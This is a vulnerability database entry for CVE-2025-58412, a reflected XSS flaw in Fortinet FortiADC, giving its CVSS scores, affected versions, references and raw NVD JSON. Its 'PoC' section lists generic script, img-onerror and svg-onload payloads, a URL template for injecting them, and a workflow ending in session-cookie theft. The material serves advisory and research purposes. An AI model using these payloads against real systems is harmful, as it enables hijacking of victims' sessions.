CVE-2025-58412

Description

A improper neutralization of script-related html tags in a web page (basic xss) vulnerability in Fortinet FortiADC 8.0.0, FortiADC 7.6.0 through 7.6.3, FortiADC 7.4 all versions, FortiADC 7.2 all versions may allow attacker to execute unauthorized code or commands via crafted URL.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:fortinet:fortiadc:8.0.0:*:*:*:*:*:*:* - VULNERABLE

FortiADC 8.0.0

FortiADC 7.6.0 - 7.6.3

FortiADC 7.4 所有版本

FortiADC 7.2 所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-58412 PoC - Basic XSS in FortiADC -->
<!-- Example: Inject JavaScript alert via URL parameter -->

<!-- Method 1: Using script tag -->
<script>alert(document.domain)</script>

<!-- Method 2: Using img onerror handler -->
<img src=x onerror=alert(document.cookie)>

<!-- Method 3: Using SVG onload handler -->
<svg onload=alert('XSS')>

<!-- Full URL example -->
<!-- https://<target>/path?param=<script>alert(document.cookie)</script> -->

<!-- Attack workflow:
1. Attacker crafts malicious URL with XSS payload
2. Attacker tricks victim into clicking the URL (phishing, email, etc.)
3. Victim's browser sends request to FortiADC
4. Server reflects unsanitized input in response
5. Victim's browser executes injected JavaScript
6. Attacker steals session cookies/credentials via JS
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-58412
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-58412
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-58412/
[4] VulDB https://vuldb.com/cve/CVE-2025-58412
[5] https://fortiguard.fortinet.com/psirt/FG-IR-25-736

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-58412", "sourceIdentifier": "[email protected]", "published": "2025-11-19T10:15:45.257", "lastModified": "2025-11-20T14:38:45.610", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A improper neutralization of script-related html tags in a web page (basic xss) vulnerability in Fortinet FortiADC 8.0.0, FortiADC 7.6.0 through 7.6.3, FortiADC 7.4 all versions, FortiADC 7.2 all versions may allow attacker to execute unauthorized code or commands via crafted URL."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.6.4", "matchCriteriaId": "026A9B16-7DB1-4488-B13D-F61272BAE7F1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiadc:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "FE5091E7-982E-451B-B782-4C9669421558"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-736", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}